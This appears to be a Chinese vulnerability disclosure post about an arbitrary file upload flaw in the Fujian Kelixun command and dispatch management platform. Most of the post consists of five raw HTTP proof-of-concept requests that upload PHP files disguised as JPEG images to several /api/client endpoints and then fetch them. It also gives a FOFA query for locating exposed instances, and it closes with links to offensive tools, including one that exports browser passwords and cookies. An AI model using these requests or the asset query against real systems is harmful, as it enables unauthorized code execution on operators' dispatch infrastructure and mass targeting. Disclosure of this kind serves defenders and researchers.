影响范围
福建科立讯通信指挥调度管理平台
漏洞概述
福建科立讯通信指挥调度管理平台任意文件上传
漏洞复现
应用界面如下:
漏洞POC1:
POST /api/client/fileupload.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Length: 477------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="file"; filename="rcnlsq.php"Content-Type: image/jpeg5465rcnlsq------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="number";5465------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="type";1------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="title";1------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
利用方式2:
POST /api/client/upload.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Length: 194------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="ulfile"; filename="lztkkl.php"Content-Type: image/jpeg99647lztkkl------WebKitFormBoundaryVBf7Cs8QWsfwC82M--GET /upload/lztkkl.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: close
利用方式3:
POST /api/client/task/uploadfile.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Length: 198------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="uploadfile"; filename="rvfuid.php"Content-Type: image/jpeg97236rvfuid------WebKitFormBoundaryVBf7Cs8QWsfwC82M--文件路径:响应包获取
利用方式4:
POST /api/client/event/uploadfile.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Length: 198------WebKitFormBoundaryVBf7Cs8QWsfwC82MContent-Disposition: form-data; name="uploadfile"; filename="iuctmt.php"Content-Type: image/jpeg48620iuctmt------WebKitFormBoundaryVBf7Cs8QWsfwC82M--文件地址:响应包获取
利用方式5:
POST /api/client/upload.php HTTP/1.1Host:User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaKContent-Length: 200------WebKitFormBoundarymVk33liI64J7GQaKContent-Disposition: form-data; name="ulfile"; filename="dzfuxvtm.php"Content-Type: image/jpegdzfuxvtm186448------WebKitFormBoundarymVk33liI64J7GQaK--GET /upload/dzfuxvtm.php HTTP/1.1Host:User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: close
资产测绘
FOFA检索:
body="指挥调度管理平台" && title=="指挥调度管理平台"免责声明
本篇文章提及的漏洞POC仅限于安全人员在授权的情况下对业务系统进行测评验证,由于传播、利用本篇文章中提及的漏洞POC进行未授权的非法攻击测试造成的法律责任均由使用者本人负责,本人不为此承担任何责任
·推 荐 阅 读·
最新后渗透免杀工具
【护网必备】高危漏洞综合利用工具
【护网必备】Shiro反序列化漏洞综合利用工具增强版
【护网必备】外网打点必备-WeblogicTool
【护网必备】最新Struts2全版本漏洞检测工具
Nacos漏洞综合利用工具
重点OA系统漏洞利用综合工具箱
【护网必备】海康威视RCE批量检测利用工具
【护网必备】浏览器用户密码|Cookie|书签|下载记录导出工具
横向移动之RDP&Desktop Session Hija
